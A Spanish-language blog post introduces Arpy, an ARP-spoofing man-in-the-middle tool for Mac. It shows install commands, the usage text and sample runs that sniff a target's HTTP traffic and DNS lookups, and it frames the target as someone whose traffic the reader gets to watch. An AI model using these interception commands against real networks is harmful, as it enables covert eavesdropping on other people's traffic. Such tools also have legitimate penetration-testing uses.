Vistas de página en total

36655

lunes, 15 de febrero de 2016

Herramienta de Arpy-Mac OSX Arp Spoof (MITM) #ARP #Arpy #DNS

Arpy es una herramienta fácil de usar suplantación ARP MITM para Mac. Proporciona 3 funciones específicas:

 la detección de paquetes
 Los dominios visitados
 Los dominios visitados con Gource

Cada función se explicará a continuación.
 OS probado (hasta la fecha) Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)


 requisitos 

  • Python 2.7 
  • Gource 
  •  Scapy 
  • Instalación 
  •  
    Gource 
  •  
    brew install gource
     
     Scapy 
     
     pip install scapy
     
     Los comandos de muestra 
     

    ivanvza:~/ > sudo arpy
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>
    
    ARP MiTM Tool
    
    Options:
      -h, --help            show this help message and exit
      -t TARGET, --target=TARGET
                            The Target IP
      -g GATEWAY, --gateway=GATEWAY
                            The Gateway
      -i INTERFACE, --interface=INTERFACE
                            Interface to use
      --tcp                 Filters out only tcp traffic
      --udp                 Filters out only udp traffic
      -d D_PORT, --destination_port=D_PORT
                            Filter for a destination port
      -s S_PORT, --source_port=S_PORT
                            Filter for a source port
      --sniff               Sniff all passing data
      --sniff-dns           Sniff only searched domains
      --sniff-dns-gource    Output target's DNS searches in gource format
      -v                    Verbose scapy packet print
     
     Sniff de paquetes
       Este es el analizador de paquetes, que le permite ver el tráfico de tu objetivo. 
     
     ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    
      [Info] Starting Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
    
    [Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
    GET / HTTP/1.1
    User-Agent: curl/7.37.1
    Host: ivanvza.ninja
    Accept: */*
    
    
    
    [Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
    HTTP/1.1 200 OK
    Vary: Accept-Encoding
    Content-Type: text/html
    Accept-Ranges: bytes
    ETag: "2719538271"
    Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
    Content-Length: 3213
    Date: Fri, 29 May 2015 20:15:06 GMT
    Server: Microsoft IIS
    
    <html>
         <title>><></title>
        <body>
            <pre style="line-height: 1.25; white-space: pre;">
            \          SORRY            /
             \                         /
              \    This page does     /
               ]   not exist yet.    [    ,'|
               ]                     [   /  |
               ]___               ___[ ,'   |
               ]  ]\             /[  [ |:   |
               ]  ] \           / [  [ |:   |
               ]  ]  ]         [  [  [ |:   |
               ]  ]  ]__     __[  [  [ |:   |
               ]  ]  ] ]\ _ /[ [  [  [ |:   |
               ]  ]  ] ] (#) [ [  [  [ :===='
               ]  ]  ]_].nHn.[_[  [  [
               ]  ]  ]  HHHHH. [  [  [
               ]  ] /   `HH("N  \ [  [
               ]__]/     HHH  "  \[__[
               ]         NNN         [
               ]         N/"         [
               ]         N H         [
              /          N            \
             /           q,            \
            /                           \
            </pre>
            <h3 id="list"><h3>
        </body>
    <script>
    
    // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
    var RTCPeerConnection = /*window.RTCPeerConnection ||
     
     Sniff DNS 
       Esta función le permite ver los nombres de dominio que su destino está solicitando actualmente. 
     
     ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
             - @viljoenivan
    
    
      [Info] Starting DNS Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Done...
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
     
     Con DNS Sniff Gource 
     
     Esta función es más o menos la misma que la anterior, sin embargo, 
    proporciona la funcionalidad para pasarla a través Gource para conseguir
     una transmisión en vivo de lo que su objetivo está viendo.
     
     ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
    [INFO] For a live gource feed run this command in parallel with this one:
    
    tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
    
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
     
     Muestra imágenes Gource

No hay comentarios:

Publicar un comentario